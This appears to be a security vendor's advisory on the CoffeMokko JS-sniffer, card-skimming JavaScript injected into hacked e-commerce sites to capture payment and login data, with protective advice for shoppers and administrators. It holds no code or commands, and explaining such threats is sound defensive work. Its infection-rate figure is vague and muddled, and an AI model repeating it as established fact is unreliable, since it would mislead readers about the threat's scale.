CoffeMokko JS-sniffer

The CoffeMokko JS-sniffer is a family of Trojan sniffers, which collect credit card credentials and other information during website purchases. Each member of this family is custom to a particular website that the remote attacker compromises through methods such as brute-forcing or exploiting software vulnerabilities. Both customers and website administrators can use traditional means of self-defense and have anti-malware solutions ready for deleting the CoffeMokko JS-sniffer or stopping its theft.

A Sniff of Coffee-Scented Transaction Troubles

A substantial family of Trojan sniffers – with attacks potentially impacting hundreds of thousands of Web shoppers – is starting to come under meaningful investigation in spring of 2019. The CoffeMokko JS-sniffer is competitive with other website vendor-based data collectors, such as the MagentoName JS-sniffer, although it uses a possibly-inefficient campaigning model. For reasons best known to themselves, the threat actors deploying the CoffeMokko JS-sniffer are developing new variants for each of the websites that the criminals compromise.

Like competing Trojan sniffers, the CoffeMokko JS-sniffer is inserted into the website's code after the remote attackers access it through brute-forcing the login or other methods like exploiting unpatched software vulnerabilities. Just as readers would assume from its name, the CoffeMokko JS-sniffer misuses JavaScript features for conducting its attacks, which capture transaction data from any shoppers that use the now-infected site. Malware analysts can confirm that at least some versions of the CoffeMokko JS-sniffer use obfuscation for hiding these scripts from being seen as threats, as well.

Members of the CoffeMokko JS-sniffer family use hard-coded options for capturing the target information, which, possibly, is one explanation for why new revisions appear continuously. Instead of targeting a general CMS platform like Magento, the CoffeMokko JS-sniffer concentrates on data entry fields for well-known payment processors, such as Authorize.net, PayPal, Stripe, Verisign and similar services. Through doing so, it collects passwords, credit card information and other credentials during the purchase seamlessly. Currently, malware experts' sources estimate the rates of infection from these targets that the CoffeMokko JS-sniffer is responsible for coming to just over ten percent of the payment systems industry.

Waving a Bitter Aroma out of Web Browsers

Web shoppers can monitor their Paypal accounts and other finances for any disruptions that would signify a threat actor's having access, such as an unexplained purchase. As a secondary, limited precaution, malware experts, also, advise disabling features like JavaScript, when possible, which will lower chances of browser-based attacks from various sources, including those of a Trojan sniffer. Always respond to a potential compromise by contacting the appropriate companies, canceling credit cards, and changing login and authentication information for the relevant accounts.

Server administrators should abide by the usual practices for keeping their sites from being at risk from attacks that would introduce the CoffeMokko JS-sniffer, or other threats, into the website's code. Updating software infrastructure will patch most of the vulnerabilities that a threat actor could abuse, and using secure logins will remove most of the risk of a brute-force attack. Anti-malware products offering website-analysis services should delete the CoffeMokko JS-sniffer's variants if there's already been a compromise.

The legacy of the Trojan sniffer is that a threat left alone will, inevitably, grow into a problem that's profitable for black hat enterprises. The CoffeMokko JS-sniffer is a strong example of that inevitability and may come with more surprises, considering its variation-prone development.